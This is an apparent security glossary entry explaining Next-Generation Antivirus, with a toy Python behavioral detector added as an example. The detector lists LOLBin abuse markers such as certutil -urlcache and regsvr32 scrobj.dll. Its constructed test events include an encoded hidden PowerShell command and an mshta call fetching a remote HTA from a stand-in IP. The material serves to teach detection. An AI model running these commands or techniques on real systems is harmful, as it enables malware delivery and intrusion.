Next-Generation Antivirus (NGAV)
What is Next-Generation Antivirus (NGAV)?
Endpoint protection that augments signature scanning with machine-learning models, behavioral analytics, and exploit prevention to stop unknown and fileless threats.
Next-Generation Antivirus (NGAV) emerged in the mid-2010s in response to the limits of signature-only AV, which can only block files that someone has already seen and fingerprinted. Products such as CrowdStrike Falcon, SentinelOne Singularity, Microsoft Defender for Endpoint, VMware Carbon Black, and Cybereason combine cloud-trained machine-learning classifiers that score a file before it executes, behavioral monitors that watch process-tree, API and file-system telemetry at runtime, exploit-mitigation modules that block common memory-corruption techniques in targeted applications, and Indicator-of-Attack (IOA) rules that match sequences of actions rather than artifacts. Because these controls key on what code does, NGAV can block fileless techniques such as LOLBin abuse (signed system binaries like mshta, rundll32 or regsvr32 executing attacker-supplied content) and reflective DLL loading, which leave nothing on disk for a classical signature to match. NGAV is the prevention layer typically packaged with an EDR or XDR sensor: NGAV blocks, EDR records and investigates. NIST SP 800-83 covers malware prevention and handling for desktops and laptops, and the MITRE Engenuity ATT&CK Evaluations benchmark endpoint products against emulated adversary behavior. Effective NGAV shortens attacker dwell time, but behavioral rules also fire on legitimate activity (build scripts spawning shells, debuggers injecting into processes), so developer-heavy environments need allow-listing and tuning to keep false positives manageable.
● Examples
- 01
CrowdStrike Falcon Prevent blocking a previously unseen ransomware binary because of what it did at runtime (rapidly encrypting and renaming user files) rather than because its hash matched a signature.
- 02
Microsoft Defender Attack Surface Reduction (ASR) rule "Block all Office applications from creating child processes", which stops a malicious macro in Word or Excel from launching cmd.exe or PowerShell.
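The behavioral layer described above and both examples (a ransomware binary caught by what it does, an Office application blocked from spawning a child process), as an added example that is not code from this page or from any of the vendors named: a toy IOA detector in Python run over constructed process-creation and file-rename events, with a hash-lookup "signature" scan beside it to show that the same events produce nothing when only hashes are compared. The event shape, rule markers, threshold, developer-tool allow-list and every sample event are assumptions made for the illustration.

```python
"""Toy NGAV-style behavioral (IOA) detector over process and file telemetry.

Added example for this page, not code from any NGAV vendor. The event shape,
rule thresholds, allow-list and all sample events below are constructed for
illustration.
"""
from collections import defaultdict
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe", "wscript.exe", "cscript.exe", "mshta.exe"}
# Command-line fragments that indicate a signed system binary (LOLBin) is
# proxying attacker-supplied content; assumed markers, not a complete list.
LOLBIN_MARKERS = {
    "mshta.exe": ("http://", "https://", "javascript:", "vbscript:"),
    "rundll32.exe": ("javascript:", "\\appdata\\", "\\temp\\"),
    "regsvr32.exe": ("/i:http", "scrobj.dll"),
    "certutil.exe": ("-urlcache", "-decode"),
}
RENAME_THRESHOLD = 20                            # renames by one process before it looks ransomware-like
DEV_TOOL_ALLOWLIST = {"msbuild.exe", "git.exe"}  # tuning knob for developer hosts (assumed)
KNOWN_BAD_SHA256 = {64 * "0"}                    # constructed signature database; nothing below matches


@dataclass
class Event:
    kind: str            # "process" (creation) or "rename" (file renamed)
    pid: int
    image: str           # lower-case image name of the acting process
    parent_image: str = ""
    cmdline: str = ""
    sha256: str = ""     # hash of the image, for the signature comparison
    new_path: str = ""   # destination path for rename events


def signature_scan(events):
    """Classic AV: flag only images whose hash is already in the database."""
    return sorted({e.pid for e in events
                   if e.kind == "process" and e.sha256 in KNOWN_BAD_SHA256})


def behavioral_scan(events):
    """NGAV-style IOA rules: judge what a process does, not what it hashes to."""
    alerts = []
    renames = defaultdict(list)   # (pid, image) -> new extensions seen
    for e in events:
        if e.kind == "process":
            # Rule 1: an Office application launching a script host, the
            # behaviour the Defender ASR rule in the example above prevents.
            if e.parent_image in OFFICE_APPS and e.image in SCRIPT_HOSTS:
                alerts.append(("office_child_process", e.pid))
            # Rule 2: a LOLBin invoked with arguments pointing at remote or
            # scripted content.
            markers = LOLBIN_MARKERS.get(e.image, ())
            if any(m in e.cmdline.lower() for m in markers):
                alerts.append(("lolbin_proxy_execution", e.pid))
        elif e.kind == "rename":
            renames[(e.pid, e.image)].append(e.new_path.rsplit(".", 1)[-1].lower())
    # Rule 3: one process renaming many files to a single new extension, the
    # file-system footprint of encryption for ransom. Allow-listed build tools
    # are skipped; that is the false-positive tuning the text mentions.
    for (pid, image), exts in renames.items():
        if image in DEV_TOOL_ALLOWLIST:
            continue
        if len(exts) >= RENAME_THRESHOLD and len(set(exts)) == 1:
            alerts.append(("mass_rename_single_extension", pid))
    return alerts


# Constructed telemetry: a macro-laden document chain, one LOLBin abuse, some
# benign noise, and a build tool doing a legitimate bulk rename.
SAMPLE_EVENTS = [
    Event("process", 100, "winword.exe", "explorer.exe", r'winword.exe "C:\Users\a\invoice.docm"', "a" * 64),
    Event("process", 101, "powershell.exe", "winword.exe", "powershell -nop -w hidden -enc SQBFAFgA", "b" * 64),
    Event("process", 102, "mshta.exe", "explorer.exe", "mshta.exe https://203.0.113.7/a.hta", "c" * 64),
    Event("process", 103, "rundll32.exe", "explorer.exe", "rundll32.exe shell32.dll,Control_RunDLL", "d" * 64),
    Event("process", 104, "powershell.exe", "explorer.exe", "powershell Get-Process", "b" * 64),
    Event("process", 105, "payload.exe", "powershell.exe", "payload.exe", "e" * 64),
]
SAMPLE_EVENTS += [Event("rename", 105, "payload.exe", new_path=rf"C:\Users\a\Documents\doc{i}.docx.locked")
                  for i in range(25)]
SAMPLE_EVENTS += [Event("rename", 106, "msbuild.exe", new_path=rf"C:\src\obj\unit{i}.obj")
                  for i in range(25)]

if __name__ == "__main__":
    print("signature hits:", signature_scan(SAMPLE_EVENTS))
    for rule, pid in behavioral_scan(SAMPLE_EVENTS):
        print(f"behavioral alert: {rule} pid={pid}")
```

Running it, the signature scan returns nothing because none of the (constructed) hashes is in the database, while the behavioral scan flags the PowerShell spawned by Word (pid 101), mshta fetching a remote HTA (pid 102) and the process renaming 25 documents to one new extension (pid 105); the benign rundll32 call, the interactive PowerShell session and the allow-listed msbuild rename pass. Real products evaluate far more rules on much richer telemetry, but the shape is the same: decisions keyed on parent-child relationships, command lines and rates of file-system activity rather than on file contents.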
● Frequently asked questions
What is Next-Generation Antivirus (NGAV)?
Endpoint protection that augments signature scanning with machine-learning models, behavioral analytics, and exploit prevention to stop unknown and fileless threats. It belongs to the Defense & Operations category of cybersecurity.
How does Next-Generation Antivirus (NGAV) work?
Before a file executes, an NGAV agent scores it with a cloud-trained machine-learning classifier using static features such as imports, section entropy and packer traits, so a never-before-seen binary can be blocked without a signature. At runtime the agent consumes process-creation, API-call, file-system and registry telemetry from a kernel sensor and evaluates behavioral rules and Indicator-of-Attack (IOA) patterns against it: an Office application spawning a script host, a signed system binary (LOLBin) used to run attacker-supplied content, a process loading a DLL reflectively from memory, or one process rapidly renaming many user files. Exploit-mitigation modules block common memory-corruption techniques in targeted applications. When a rule fires the agent can kill the process, quarantine the file and isolate the host, and the same telemetry is retained by the accompanying EDR sensor for investigation.
What are the limits of Next-Generation Antivirus (NGAV)?
NGAV is itself a defensive control, so the practical question is how to compensate for what it misses. Machine-learning classifiers and behavioral rules can be evaded by attackers who test their payloads against the product beforehand, and rules that key on behavior also fire on legitimate activity such as build scripts spawning shells, so deployments need tuning and allow-lists in developer-heavy environments. Treat NGAV as the prevention layer of a stack: pair it with an EDR sensor to investigate what got through, validate coverage against the MITRE Engenuity ATT&CK Evaluations, and keep baseline controls such as patching, least privilege and macro restrictions in place.
What are other names for Next-Generation Antivirus (NGAV)?
Common alternative names include: NGAV, Next-gen AV.
● Related terms
- Antivirus (AV) (defense-ops № 050)
Endpoint software that detects and removes malicious files using signature databases, file scanning, and basic heuristics — the historical foundation of endpoint security.
- EDR (Endpoint Detection and Response) (defense-ops № 371)
An endpoint security technology that continuously records process, file, registry and network activity to detect, investigate and respond to threats on hosts.
- XDR (Extended Detection and Response) (defense-ops № 1254)
A security platform that unifies telemetry from endpoint, network, identity, email and cloud sensors to deliver correlated detections and integrated response actions.
- Behavioral Detection (defense-ops № 091)
A detection approach that identifies malicious activity from the runtime behavior of processes, users, and network flows rather than from static file signatures.
- Fileless Malware (malware № 417)
Malware that runs primarily in memory and leverages trusted system tools, avoiding the use of traditional executable files on disk.
- Signature-Based Detection (network-security № 1043)
A detection method that compares observed traffic, files, or behaviour against a database of known-bad patterns (signatures) to flag malicious activity.